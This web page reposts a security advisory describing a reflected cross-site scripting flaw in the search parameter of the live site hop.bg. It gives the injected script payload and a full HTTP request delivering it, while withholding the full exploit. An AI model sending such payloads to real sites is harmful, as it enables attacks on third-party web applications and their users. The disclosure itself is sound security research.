Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

Hop.bg Cross Site Scripting

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 12
## Titles: hop.bg | web app | Cross-site scripting (reflected)
## ## Titles: hop.bg | web app | Cross-site scripting (reflected)
## Author: nu11secur1ty
## Date: 11/03/2025
## Vendor: https://hop.bg/
## Software: https://hop.bg/
## Reference: https://portswigger.net/web-security/cross-site-scripting

## Description:
The value of the `srch` request parameter is copied into a JavaScript
string which is encapsulated in single quotation marks. The payload
lifmu</script><script>alert(1)</script>nkt8b was submitted in the `srch`
parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject
arbitrary JavaScript into the application's response.

STATUS: HIGH- Vulnerability

[+]Payload:
```
GET
/bg/tyrsene-123?p=123&l=1&srch=gq7ns%3c%2fscript%3e%3cscript%3ealert(1)%3c%2fscript%3ein737&submit_search=
HTTP/1.1
Host: hop.bg
Cache-Control: max-age=0
Sec-CH-UA: "Chromium";v="141", "Not;A=Brand";v="24", "Google Chrome";v="141"
Sec-CH-UA-Mobile: ?0
Sec-CH-UA-Platform: "Windows"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: Public=3l4neblt0r1q8tl8r1j8vm1kg2; l=1;
_gcl_au=1.1.1810943222.1761893757;
_fbp=fb.1.1761893757009.110679894202803572; _tt_enable_cookie=1;
_ttp=01K8WGTCHG0MT2MTV43EPDVPSH_.tt.1;
_uetsid=a6fe2700b62611f0ba2e15757049e30e;
_uetvid=a6fe6880b62611f0a84c27f8eba50d96;
ttcsid=1761893757500::mkwLVMcL6Tixw1dD6Twz.1.1761893767648.0;
ttcsid_D0S5A7RC77U1EAH3MNBG=1761893757499::8I3zM_RSsJeOcW0e8fgM.1.1761893767648.0
Upgrade-Insecure-Requests: 1
Referer: https://hop.bg/
```

[+]Exploit:
```
Not showing for security reasons
```

## Reproduce:
[href]("Not showing for security reasons")


## Demo PoC:
[href](Not showing for security reasons)

## Time spent:
01:27:00


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/ and
https://www.asc3t1c-nu11secur1ty.com/
nu11secur1ty <https://nu11secur1ty.blogspot.com/>

Social Media Share